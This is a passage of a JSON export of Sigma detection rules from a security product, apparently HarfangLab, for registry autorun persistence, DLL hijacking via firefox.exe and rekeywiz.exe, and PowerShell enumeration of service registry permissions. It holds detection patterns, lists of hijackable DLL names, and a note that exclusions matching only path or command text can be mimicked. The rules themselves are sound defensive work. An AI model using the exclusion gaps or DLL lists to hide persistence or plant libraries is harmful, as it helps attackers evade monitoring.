'??:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe? 
--background=true'\n - '??:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe?'\n exclusion_adobe:\n ProcessImage:\n - '*\\Adobe\\AdobeConnect\\Installer\\ConnectAppSetup.exe'\n - '*\\Adobe\\Adobe Connect\\ConnectAppSetup.exe'\n - '*\\Sources\\SetupHost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n Details:\n - '??:\\Users\\\\*\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n - '??:\\windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n exclusion_adobe_2:\n ProcessSigned: 'true'\n ProcessOriginalFileName: 'ConnectAppSetup.exe'\n Details:\n - '??:\\Users\\\\*\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n - '??:\\windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n exclusion_adobe_3:\n ProcessSigned: 'true'\n ProcessOriginalFileName: 'msiexec.exe'\n Details: '??:\\windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n exclusion_exclaimer:\n # C:\\Program Files (x86)\\Exclaimer Ltd\\Cloud Signature Update Agent\\Exclaimer.CloudSignatureAgent.exe\n ProcessImage|endswith: '\\Exclaimer.CloudSignatureAgent.exe'\n Details: '??:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Exclaimer Ltd\\Exclaimer Cloud Signature Update Agent.appref-ms?'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Exclaimer Cloud Signature Update Agent'\n exclusion_restart:\n ProcessImage: '?:\\Windows\\System32\\csrss.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #?'\n exclusion_spotify:\n - ProcessImage|endswith: '\\AppData\\Roaming\\Spotify\\Spotify.exe'\n 
Details|endswith:\n - '\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart'\n - '\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized'\n - '\\AppData\\Roaming\\Spotify\\SpotifyLauncher.exe --autostart'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SpotifyLauncher'\n - ProcessImage|endswith: '\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n Details|endswith: '\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify'\n exclusion_cacaoweb:\n Details|endswith: '\\AppData\\Roaming\\cacaoweb\\cacaoweb.exe? -noplayer'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\cacaoweb'\n exclusion_systevo:\n Details: '?:\\Users\\\\*\\AppData\\Roaming\\INSTAL~*\\{*\\setup.exe -reboot?:\\Users\\\\*\\AppData\\Roaming\\INSTAL~*\\{*\\reboot.ini*'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce\\InstallShieldSetup'\n exclusion_movavi_helper:\n Details: '?:\\Users\\\\*\\AppData\\Roaming\\MovaviHelper\\MovaviHelper.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Movavi_MovaviHelper'\n\n # Exclusion for \\Users\\Public\\\n exclusion_norton:\n Details: '?:\\Users\\Public\\Downloads\\Norton\\{??????????-????-????????}\\FSDUI_Custom.exe /m /SHOWONECLICK /WIN10_UPGRADE ??:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\Upgrade.exe?'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Norton Download Manager{??????????-????-????????}'\n\n # Exclusion for \\Users\\Default\\\n exclusion_clickshare:\n # C:\\Users\\Default\\AppData\\Local\\ClickShare\\current\\ClickShare.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Barco N.V.'\n Details: '?:\\Users\\Default\\AppData\\Local\\ClickShare\\ClickShare.exe --minimized'\n TargetObject|endswith: 
'\\Microsoft\\Windows\\CurrentVersion\\Run\\ClickShare'\n\n exclusion_movavi_video_suite:\n # C:\\Users\\xxxx\\AppData\\Roaming\\Movavi Video Suite 22\\AgentInformer.exe\n # C:\\Users\\xxxxx\\AppData\\Local\\Temp\\Movavi-installer-73a268c0-f514-4f37-9c8e-2dd2df2c05aa\\InstallerGUI.exe\n Image|endswith:\n - '\\AgentInformer.exe'\n - '\\InstallerGUI.exe'\n ProcessSignature: 'Movavi Software Limited'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\movavi_suite_agent'\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\movavi_suiteplatform_agent'\n Details|contains: '\\AgentInformer.exe'\n\n exclusion_windows_update:\n ProcessImage:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n\n exclusion_copernic:\n Details|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\Copernic\\start_copernic.cmd'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Copernic'\n\n exclusion_utorrent:\n TargetObject|endswith:\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\uTorrent'\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ut' # seen from 2021 ?\n Details|contains: 'AppData\\Roaming\\uTorrent\\uTorrent.exe'\n\n exclusion_archicad:\n ProcessParentImage|endswith: '\\ARCHICAD-??-Update-????-?.?.exe'\n Details|startswith: 'cmd.exe /C del '\n\n exclusion_wiseguard:\n Details|contains: 'cmd.exe /c REG DELETE HKLM\\SOFTWARE\\Enatel\\WiseGuard\\AdvancedLogin /v DontRestartSecurityServices /f'\n\n exclusion_bitorrent:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\bittorrent\\BitTorrent.exe* /MINIMIZED'\n - '?:\\Users\\\\*\\AppData\\Roaming\\BitTorrent Web\\btweb.exe* /MINIMIZED'\n\n exclusion_plustek:\n Details|contains:\n - 'CMD.EXE /C DEL /Q *?:\\Program Files (x86)\\Plustek\\Plustek SmartOffice*\\ScanAdvanced.dll*'\n - 'CMD.EXE /C REN *?:\\Program Files (x86)\\Plustek\\Plustek SmartOffice *\\ScanAdvanced.dll.new* *ScanAdvanced.dll*'\n\n 
exclusion_honeywell:\n Details|contains: 'cmd.exe /c regsvr32 /s *?:\\Program Files (x86)\\Honeywell\\client\\station\\components\\hscPointBrowseDialog.exe*'\n\n exclusion_nchsoftware:\n Details|contains:\n - 'cmd.exe /C rmdir /Q *?:\\Program Files (x86)\\NCH Software\\ExpressZip*'\n - 'cmd.exe /C rmdir /S /Q *?:\\Program Files (x86)\\NCH Software\\ExpressZip*'\n\n exclusion_nomachine:\n Details|contains: 'cmd.exe /c *rmdir /S /Q *?:\\Program Files (x86)\\NoMachine*'\n\n exclusion_movavi:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Movavi Suite\\MovaviSuite.exe* --silent-platform-mode-enabled'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Movavi Video Converter\\ConverterAgent.exe'\n\n exclusion_cisco_2:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Cisco\\Proximity\\proximity.exe* --autostart'\n\n exclusion_fiery:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Fiery Software Manager\\fsm_reboot.bat'\n - 'rundll32.exe ?:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"?:\\VCREDI?\\\"'\n\n exclusion_weadvocacy:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\we advocacy\\we advocacy\\we advocacy.appref-ms'\n\n exclusion_hubspot:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Hubspot\\HubSpot for Windows.appref-ms'\n\n exclusion_penumbra:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Penumbra\\Penumbra.exe'\n\n exclusion_miteldialer:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Mitel\\MitelDialer\\MitelDialer.exe? -s'\n - '?:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming\\Mitel\\MitelDialer\\MitelDialer.exe? 
-s'\n\n exclusion_svgviewer:\n Details|contains:\n - '?:\\windows\\system32\\cmd.exe /D /Q /C del /F /Q *?:\\Program Files (x86)\\Common Files\\Adobe\\SVG Viewer 3.0\\FileOps.exe*'\n - '?:\\windows\\system32\\cmd.exe /D /Q /C rd /S /Q *?:\\Program Files (x86)\\Common Files\\Adobe\\SVG Viewer 3.0*'\n\n exclusion_prtgnetworkmonitor:\n Details|contains: '?:\\Windows\\System32\\cmd.exe /q/c RMDIR /S/Q *?:\\Program Files (x86)\\PRTG Network Monitor*'\n\n exclusion_logitech_2:\n Details|contains: '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\System32\\LogiLDA.dll,LogiFetch'\n\n exclusion_autocad:\n Details|contains: 'rundll32.exe ?:\\windows\\system32\\advpack.dll,DelNodeRunDLL32 \"?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.tmp\\\\*'\n\n exclusion_graphisoft:\n ProcessImage: '?:\\Program Files\\GRAPHISOFT\\BIMx Desktop Viewer\\Uninstall.BIMx\\uninstaller.exe'\n Details: 'cmd.exe /C del \"?:\\windows\\Temp\\LaunchAR.exe\"'\n\n exclusion_teams:\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Teams.Teams' # MS teams\n Details|contains: 'AppData\\Local\\Microsoft\\Teams\\Update.exe'\n\n exclusion_teamviewer:\n ProcessImage|endswith: '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n Details|contains: '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n\n exclusion_alcatel:\n ProcessImage|endswith: '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n Details|contains: '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n\n exclusion_razer:\n Details: '?:\\Program Files (x86)\\Razer\\\\*\\RzInstallerDeletion*.vbs'\n ProcessSigned: 'true'\n ProcessSignature: 'Razer USA Ltd.'\n\n exclusion_hp_delivery:\n ProcessImage: '?:\\Windows\\System32\\MsiExec.exe'\n Details: 'Rundll32.exe printui.dll,PrintUIEntry /m \"HP Delivery Driver V4\" /dd /q'\n\n exclusion_gadata:\n ProcessImage: '?:\\Program Files (x86)\\G Data\\AVKClient\\AVKWCtlx64.exe'\n Details|startswith: 
'undll32.exe \"?:\\Program Files (x86)\\Common Files\\G DATA\\AVKProxy\\'\n\n exclusion_pdf_pro_suite:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\PDFProSuite\\pdfprosuite.exe'\n Details: 'cmd.exe /c \"start /min /d \"?:\\Users\\\\*\\AppData\\Local\\PDFProSuite\" PDFProSuite . --update\"'\n\n exclusion_ivanti:\n ProcessImage: '?:\\program files (x86)\\ivanti\\workspace control\\pfwsmgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_drvinst:\n ProcessImage: '?:\\Windows\\System32\\drvinst.exe'\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n\n exclusion_beyondtrust:\n ProcessImage|endswith:\n - '\\sra-scc.exe'\n - '\\sra-con.exe'\n - '\\sra-pin.exe'\n - '\\bomgar-scc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BeyondTrust Corporation'\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Sra_Cleanup_ZD'\n\n exclusion_nch_software:\n ProcessImage|endswith: '\\AppData\\Roaming\\NCH Software\\Program Files\\\\*\\\\*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NCH Software, Inc.'\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*RunOnStartup'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*UpdateCheck'\n\n exclusion_modplus:\n ProcessImage|endswith: '\\AppData\\Roaming\\ModPlus\\mpAutoUpdater.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'IP Pekshev Alexander Aleksandrovich'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ModPlusAutoUpdater'\n\n exclusion_schneider:\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # with a space before ISS\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # with 2 spaces before ISS\n\n exclusion_asus:\n ProcessOriginalFileName: 'SmatData.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CS Dispatch'\n\n 
exclusion_lifen:\n ProcessImage|endswith: '\\Default\\AppData\\Local\\lifen\\app-*\\Lifen.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Honestica'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifen.Lifen'\n\n exclusion_bimandco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Roaming\\BimAndCo\\StandAloneApp\\BimAndCo.StandAloneApp.exe'\n ProcessOriginalFileName: 'BimAndCo.StandAloneApp.dll'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\StandAloneApp'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fd2e4d65-00d6-4661-a5f4-ad92fe8d4540",
"rule_name": "Suspicious Registry Autorun Key Added",
"rule_description": "Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\nAutostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\nIt is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nNote that many of this rule's exclusions match only on the registry value data (an expected path or command line) and not on a signed writing process, so an entry that mimics an excluded path or command line will not alert; do not treat the absence of an alert on these keys as proof of legitimacy, and review the exclusion list periodically.\n",
"rule_creation_date": "2023-06-22",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fd9b7646-9c2d-41c6-8580-5ad80591e94c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079012Z",
"creation_date": "2026-03-23T11:45:34.079014Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079019Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_firefox.yml",
"content": "title: DLL Hijacking via Firefox\nid: fd9b7646-9c2d-41c6-8580-5ad80591e94c\ndescription: |\n Detects potential Windows DLL Hijacking via firefox.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'firefox.exe'\n ProcessSignature: 'Mozilla Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\rasadhlp.dll'\n - '\\windows.storage.dll'\n - '\\winrnr.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla 
Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fd9b7646-9c2d-41c6-8580-5ad80591e94c",
"rule_name": "DLL Hijacking via Firefox",
"rule_description": "Detects potential Windows DLL Hijacking via firefox.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fda8f576-7252-48e1-8518-31282f360d7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072275Z",
"creation_date": "2026-03-23T11:45:34.072277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072281Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_service_registry_permissions_weakness_check.yml",
"content": "title: Services Registry Permissions Enumerated via PowerShell\nid: fda8f576-7252-48e1-8518-31282f360d7b\ndescription: |\n Detects when the Get-Acl PowerShell command is used alongside the Services registry path to get the security parameters of a service's registry keys.\n Adversaries can use this method to find services with weak parameters and modify their settings to establish persistence and/or privilege escalation.\n It is recommended to investigate the context in which this command was executed to determine legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2022/12/23\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|re:\n - '(?i)get-acl [[:print:]]+\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\'\n - '(?i)get-acl -P[ath]{0,3} [[:print:]]+\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\'\n\n exclusion_ivanti:\n ProcessParentImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\Respesvc64.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-tss/introduction-to-troubleshootingscript-toolset-tss\n exclusion_tss:\n PowershellCommand|contains|all:\n - 'module for collecting ETW traces and various custom tracing functionality'\n - 'TSS https://internal.evergreen.microsoft.com/en-us/help/4619187'\n - '<# latest changes'\n - '#region --- ETW component trace Providers ---'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fda8f576-7252-48e1-8518-31282f360d7b",
"rule_name": "Services Registry Permissions Enumerated via PowerShell",
"rule_description": "Detects when the Get-Acl PowerShell command is used alongside the Services registry path to read the access control list (security descriptor) of a service's registry keys.\nAdversaries can use this method to find services whose registry keys have weak permissions and modify their configuration to establish persistence and/or privilege escalation.\nIt is recommended to investigate the context in which this command was executed to determine legitimacy.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe0026b0-367c-4484-8488-18b8d913226b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076911Z",
"creation_date": "2026-03-23T11:45:34.076913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076917Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rekeywiz.yml",
"content": "title: DLL Hijacking via rekeywiz.exe\nid: fe0026b0-367c-4484-8488-18b8d913226b\ndescription: |\n Detects potential Windows DLL Hijacking via rekeywiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rekeywiz.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\CRYPTBASE.DLL'\n - '\\CRYPTUI.dll'\n - '\\DSROLE.dll'\n - '\\duser.dll'\n - '\\EFSADU.dll'\n - '\\EFSUTIL.dll'\n - '\\FeClient.dll'\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\USERENV.dll'\n - '\\VAULTCLI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 
'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fe0026b0-367c-4484-8488-18b8d913226b",
"rule_name": "DLL Hijacking via rekeywiz.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rekeywiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fe179170-1bf7-4cc0-815e-3a0021d10561",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608639Z",
"creation_date": "2026-03-23T11:45:34.608642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608649Z",
